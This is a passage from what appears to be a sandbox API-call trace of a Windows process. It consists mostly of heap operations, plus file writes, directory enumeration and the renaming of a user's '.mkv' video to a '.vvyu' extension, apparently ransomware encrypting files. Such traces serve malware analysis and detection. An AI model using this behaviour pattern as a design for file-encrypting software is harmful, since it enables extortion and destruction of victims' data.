Size=0x4) returned 0x2c78a30 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32f0 [0200.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0200.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3308 [0200.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32d8 [0200.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3368 [0200.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0200.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3338 [0200.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3320 [0200.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3380 [0200.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3320 [0200.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0200.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0200.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32f0 [0200.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0200.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0200.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0200.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0200.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0200.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0200.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f930 | out: hHeap=0x620000) returned 1 [0200.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.283] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x140fd, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x140fd, lpOverlapped=0x0) returned 1 [0200.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.284] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x14102, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.284] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0200.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0200.287] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.288] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.288] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.288] CloseHandle (hObject=0x510) returned 1 [0200.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0200.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0200.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0200.293] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\ufb ajK.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\ufb ajk.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\ufb ajK.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\ufb ajk.mkv.vvyu")) returned 1 [0200.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.295] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0200.298] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41c50b10, ftCreationTime.dwHighDateTime=0x1d89c0d, ftLastAccessTime.dwLowDateTime=0x59db12e0, ftLastAccessTime.dwHighDateTime=0x1d89cb6, ftLastWriteTime.dwLowDateTime=0x59db12e0, ftLastWriteTime.dwHighDateTime=0x1d89cb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vtiS4AAZ_oK", cAlternateFileName="VTIS4A~1")) returned 1 [0200.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0200.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0200.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb48c8 [0200.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0200.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0200.299] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd938fc0, ftCreationTime.dwHighDateTime=0x1d89e03, ftLastAccessTime.dwLowDateTime=0x34fdb060, ftLastAccessTime.dwHighDateTime=0x1d8a303, ftLastWriteTime.dwLowDateTime=0x34fdb060, ftLastWriteTime.dwHighDateTime=0x1d8a303, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zpV7u7xPWr7qK", cAlternateFileName="ZPV7U7~1")) returned 1 [0200.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0200.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0200.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0200.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0200.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0200.299] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd938fc0, ftCreationTime.dwHighDateTime=0x1d89e03, ftLastAccessTime.dwLowDateTime=0x34fdb060, ftLastAccessTime.dwHighDateTime=0x1d8a303, ftLastWriteTime.dwLowDateTime=0x34fdb060, ftLastWriteTime.dwHighDateTime=0x1d8a303, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zpV7u7xPWr7qK", cAlternateFileName="ZPV7U7~1")) returned 0 [0200.299] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0200.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0200.301] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0200.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0200.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0200.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab30 | out: hHeap=0x620000) returned 1 [0200.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0200.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4860 | out: hHeap=0x620000) returned 1 [0200.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaad8 | out: hHeap=0x620000) returned 1 [0200.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaef8 | out: hHeap=0x620000) returned 1 [0200.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb46c0 | out: hHeap=0x620000) returned 1 [0200.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1b30 | out: hHeap=0x620000) returned 1 [0200.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a68 | out: hHeap=0x620000) returned 1 [0200.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1b88 | out: hHeap=0x620000) returned 1 [0200.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0200.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4ad0 | out: hHeap=0x620000) returned 1 [0200.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0200.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a80 | out: hHeap=0x620000) returned 1 [0200.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0200.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0200.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0200.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0200.303] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0200.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0200.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 